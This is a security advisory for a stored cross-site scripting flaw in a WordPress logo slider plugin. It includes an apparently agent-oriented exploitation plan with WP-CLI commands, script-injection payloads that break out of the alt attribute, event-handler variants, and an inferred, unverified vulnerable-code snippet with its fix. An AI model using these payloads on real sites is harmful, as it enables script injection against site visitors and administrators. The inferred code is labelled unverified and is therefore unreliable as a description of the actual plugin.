CVE-2026-0609

Logo Slider <= 4.9.0 - Authenticated (Author+) Stored Cross-Site Scripting via 'logo-slider' Shortcode

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Logo Slider – Logo Carousel, Logo Showcase & Client Logo Slider Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image alt text in all versions up to, and including, 4.9.0 due to insufficient input sanitization and output escaping in the 'logo-slider' shortcode. This makes it possible for authenticated attackers, with author level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.9.0
PublishedMarch 20, 2026
Last updatedJune 25, 2026
Affected pluginlogo-slider-wp
Research Plan
Unverified

This research plan outlines the technical steps required to exploit a Stored Cross-Site Scripting (XSS) vulnerability in the **Logo Slider – Logo Carousel, Logo Showcase & Client Logo Slider** plugin (version <= 4.9.0). --- ### 1. Vulnerability Summary The plugin registers a shortcode `[logo-slide…

Show full research plan

This research plan outlines the technical steps required to exploit a Stored Cross-Site Scripting (XSS) vulnerability in the Logo Slider – Logo Carousel, Logo Showcase & Client Logo Slider plugin (version <= 4.9.0).


1. Vulnerability Summary

The plugin registers a shortcode [logo-slider] used to display a gallery or carousel of logos. When rendering the slider, the plugin retrieves logo information (including image URL and alt text) and outputs it into the HTML document. In affected versions, the image's alt text is retrieved from the database and concatenated into the <img> tag without adequate sanitization or attribute escaping (e.g., missing esc_attr()).

This allows an authenticated user with "Author" privileges or higher to inject a malicious payload into the alt text field of a logo. When any user (including an Administrator) views a page containing the [logo-slider] shortcode, the payload executes.

2. Attack Vector Analysis

  • Endpoint: The vulnerability is triggered via a GET request to any frontend page containing the [logo-slider] shortcode.
  • Injection Point: The alt text attribute of a "Logo" post (likely a Custom Post Type).
  • Authentication: Requires "Author" level access or higher. Authors can typically create/edit their own "Logo" entries if the plugin uses a Custom Post Type (CPT) and doesn't restrict those capabilities.
  • Vulnerable Sink: The HTML alt attribute within an <img> tag in the shortcode's output.

3. Code Flow (Inferred)

  1. Registration: The plugin uses add_shortcode('logo-slider', '...') to register the handler.
  2. Retrieval: The handler function (e.g., logo_slider_wp_shortcode) performs a query (likely get_posts or a custom $wpdb query) to fetch logo entries from the wp_posts table (where post_type is likely logo_slider or similar).
  3. Metadata Extraction: For each logo, the plugin fetches the image ID and its associated "alt" text. This might be the standard WordPress attachment alt text (_wp_attachment_image_alt) or a custom meta field (e.g., _logo_image_alt).
  4. Rendering: The plugin builds an HTML string:
    // Vulnerable Pattern
    $output .= '<img src="' . $image_url . '" alt="' . $logo_alt_text . '">'; 
    
  5. Sink: The raw $output is returned by the shortcode and echoed by WordPress onto the page.

4. Nonce Acquisition Strategy

This is a Stored XSS vulnerability.

  • Injection Phase: If injecting via the WordPress Admin UI, a nonce is required. However, for a PoC, we can use WP-CLI to inject the payload directly into the database, bypassing nonce requirements and focusing on the delivery/execution.
  • Trigger Phase: No nonce is required to trigger the XSS. The payload executes automatically when a user views the published page.

5. Exploitation Strategy

Step 1: Identify the Custom Post Type

First, determine the slug used for logo entries.

wp post-type list --fields=name,label

Look for names like logo_slider, logo-slider, or wplp_logos.

Step 2: Create Malicious Logo Entry

Create a new logo entry and set the payload in the field that the plugin uses for "Alt Text".
Payload: "><script>alert(document.domain)</script><img src="

# Assuming the CPT is 'logo_slider' and the alt text is stored in post_content or a meta field
# If it's a meta field (common), we'll set it in Step 3.
wp post create --post_type=logo_slider --post_title="Exploit Logo" --post_status=publish

Step 3: Inject Payload into Meta

If the alt text is stored in metadata (most likely):

# Replace ID with the ID from the previous command
# We will test common meta keys like 'logo_alt', 'image_alt', etc.
wp post meta set [ID] logo_alt_text '"><script>alert(document.domain)</script>'

Step 4: Deploy Shortcode

Create a public page to host the slider.

wp post create --post_type=page --post_title="Logo Showcase" --post_status=publish --post_content='[logo-slider]'

Step 5: Trigger the XSS

Use the http_request tool to navigate to the page and verify the payload renders unescaped.

  • URL: http://localhost:8888/logo-showcase/
  • Method: GET
  • Expected Response Fragment: alt=""><script>alert(document.domain)</script>"

6. Test Data Setup

  1. Plugin Installation: Ensure logo-slider-wp v4.9.0 is installed and active.
  2. Attacker User: Create a user with the 'Author' role.
    wp user create attacker attacker@example.com --role=author --user_pass=password
    
  3. Logo Content: At least one "Logo" entry must exist for the shortcode to render the <img> tags.

7. Expected Results

When the "Logo Showcase" page is visited:

  1. The browser receives HTML where the alt attribute of the logo image contains the raw script tag.
  2. The "> sequence breaks out of the alt attribute.
  3. The <script> tag executes in the context of the user's browser.
  4. An alert box showing the document domain appears.

8. Verification Steps (Post-Exploit)

  1. DOM Inspection: Use browser_eval to check if the script exists in the DOM.
    // Check for the injected script
    browser_eval("document.querySelector('img[alt*=\"alert\"]') !== null")
    
  2. Source Check:
    # View the raw HTML via http_request and grep for the payload
    curl -s http://localhost:8888/logo-showcase/ | grep "alert(document.domain)"
    

9. Alternative Approaches

  • Attachment-based Injection: If the plugin pulls alt text directly from the Media Library, the payload should be injected into an attachment's metadata:
    wp post meta set [ATTACHMENT_ID] _wp_attachment_image_alt '"><script>alert(1)</script>'
    
  • Attribute Breakout variants: If the plugin uses single quotes (alt='...'), use a single-quote breakout: '><script>....
  • Event Handlers: If <script> tags are filtered by a WAF but the attribute isn't escaped, use: x" onmouseover="alert(1)".
Research Findings
Static analysis — not yet PoC-verified

Summary

The Logo Slider plugin for WordPress fails to properly escape the 'alt' text attribute for images rendered via the [logo-slider] shortcode. This allows authenticated attackers with Author-level permissions or higher to inject malicious JavaScript into logo metadata, resulting in Stored Cross-Site Scripting (XSS) when users view the slider on the frontend.

Vulnerable Code

// From inferred shortcode handler in plugin files
// The plugin retrieves logo alt text and concatenates it directly into the HTML output

$logo_alt = get_post_meta($logo_id, '_wp_attachment_image_alt', true); 
// ... logic to build slider items ...
$output .= '<img src="' . $image_url . '" alt="' . $logo_alt . '">';

Security Fix

--- a/logo-slider-wp.php
+++ b/logo-slider-wp.php
@@ -124,1 +124,1 @@
-            $output .= '<img src="' . $image_url . '" alt="' . $logo_alt . '">';
+            $output .= '<img src="' . esc_url($image_url) . '" alt="' . esc_attr($logo_alt) . '">';

Exploit Outline

The exploit requires an attacker with 'Author' privileges or higher to modify the metadata associated with a Logo entry. 1. Authenticate as an Author or Editor. 2. Identify the Custom Post Type used for logos (e.g., 'logo_slider'). 3. Create or update a logo entry and set its 'Alt Text' field to a breakout payload such as: "><script>alert(document.domain)</script><img src=" 4. If the plugin uses standard WordPress attachment metadata, the attacker modifies the '_wp_attachment_image_alt' meta key for the logo image. 5. Create a public post or page containing the [logo-slider] shortcode. 6. When any user (including administrators) visits the page, the shortcode handler outputs the unescaped alt text, breaking out of the <img> tag and executing the injected script.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.